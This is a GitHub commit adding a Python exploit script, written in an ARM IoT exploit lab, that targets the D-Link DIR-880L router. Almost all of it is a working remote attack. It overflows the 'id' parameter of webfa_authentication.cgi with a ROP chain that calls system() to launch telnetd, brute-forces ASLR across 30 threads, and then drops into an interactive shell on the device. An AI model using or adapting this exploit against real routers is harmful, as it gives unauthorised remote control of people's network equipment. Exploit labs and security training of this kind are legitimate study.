STRLCPY/3sjay-sploits

bypassing DEP & bruting ASLR

Exploit written during ARM exploit lab of @realsaumil

3sjay committed with GitHub 2 years ago

169de647

1 parent 1e9640ba

Total 1 files

■ ■ ■ ■ ■ ■

dlink880l_expl.py

1	+	#!/usr/bin/python
2	+	#
3	+	# The ARM IoT Exploit Laboratory
4	+	# by Saumil Shah
5	+	#
6	+	# Exploit template for DLINK DIR-880L router
7	+
8	+	from telnetlib import Telnet
9	+	from time import sleep
10	+	import struct, sys, re, socket, threading
11	+
12	+	##### HELPER FUNCTIONS #####
13	+
14	+	def pack32(value):
15	+	return struct.pack("<I", value) # little byte order
16	+
17	+	def pack16n(value):
18	+	return struct.pack(">H", value) # big/network byte order
19	+
20	+	def urlencode(buf):
21	+	s = ""
22	+	for b in buf:
23	+	if re.match(r"[a-zA-Z0-9\/]", b) is None:
24	+	s += "%%%02X" % ord(b)
25	+	else:
26	+	s += b
27	+	return s
28	+
29	+	##### HELPER FUNCTIONS FOR ROP CHAINING #####
30	+
31	+	# function to create a libc gadget
32	+	# requires a global variable called libc_base
33	+	def libc(offset):
34	+	return pack32(libc_base + offset)
35	+
36	+	# function to represent data on the stack
37	+	def data(data):
38	+	return pack32(data)
39	+
40	+	# function to check for bad characters
41	+	# run this before sending out the payload
42	+	# e.g. detect_badchars(payload, "\x00\x0a\x0d/?")
43	+	def detect_badchars(string, badchars):
44	+	for badchar in badchars:
45	+	i = string.find(badchar)
46	+	while i != -1:
47	+	sys.stderr.write("[!] 0x%02x appears at position %d\n" % (ord(badchar), i))
48	+	i = string.find(badchar, i+1)
49	+
50	+	##### MAIN #####
51	+
52	+	def check(ip):
53	+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
54	+	try:
55	+	s.connect((ip, 23))
56	+	return True
57	+	except:
58	+	return False
59	+
60	+	def brute(ip, port):
61	+	global expl_successful
62	+
63	+	while expl_successful == False:
64	+
65	+	buf = "A" * 408
66	+
67	+	#libc_base = 0x4000e000
68	+	#libc_base = 0x400d7000
69	+	libc_base = 0x400e7000
70	+
71	+	bx_sp = pack32(libc_base + 0x61d5)
72	+	pop_r3_pc = pack32(libc_base + 0x00018298)
73	+	mov_r0_sp_blx_r3 = pack32(libc_base + 0x00040cb8)
74	+	system = pack32(libc_base + 0x5a270)
75	+
76	+
77	+	# building the actual rop chain
78	+	# Good ressource: https://fidusinfosec.com/remote-code-execution-cve-2018-5767/
79	+	chain = pop_r3_pc
80	+	chain += system
81	+	chain += mov_r0_sp_blx_r3
82	+	chain += "/usr/sbin/telnetd"
83	+	chain += ";abc"
84	+
85	+
86	+	#buf += pack32(0x42424242)
87	+	buf += chain
88	+
89	+
90	+	buf += "C"*(80-len(chain))
91	+
92	+	detect_badchars(buf, "\x00")
93	+
94	+	id_param = urlencode(buf)
95	+	uri = "/webfa_authentication.cgi?id=%s&password=x" % id_param
96	+
97	+	request = "GET %s HTTP/1.0\n\n" % uri
98	+	#print request,
99	+
100	+	try:
101	+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
102	+	s.connect((ip, int(port)))
103	+	s.send(request)
104	+	except:
105	+	pass
106	+
107	+
108	+
109	+	def main():
110	+	if len(sys.argv) != 3:
111	+	print("Usage: {} <ip> <port>".format(sys.argv[0]))
112	+	sys.exit(1)
113	+
114	+	ip = sys.argv[1]
115	+	port = sys.argv[2]
116	+
117	+
118	+	global expl_successful
119	+	expl_successful = False
120	+
121	+	print("[+] Running exploit against {}:{}".format(ip, port))
122	+	print("[*] Wait a bit, we're bruting ASLR...")
123	+
124	+	threads = []
125	+	for i in range(0, 30):
126	+	t = threading.Thread(target=brute, args=(ip, port))
127	+	t.start()
128	+	threads.append(t)
129	+
130	+
131	+	while expl_successful == False:
132	+	expl_successful = check(ip)
133	+
134	+	print("[+] Exploit successful! Enjoy your shell.")
135	+
136	+	tn = Telnet(ip)
137	+	tn.interact()
138	+
139	+
140	+	main()
141	+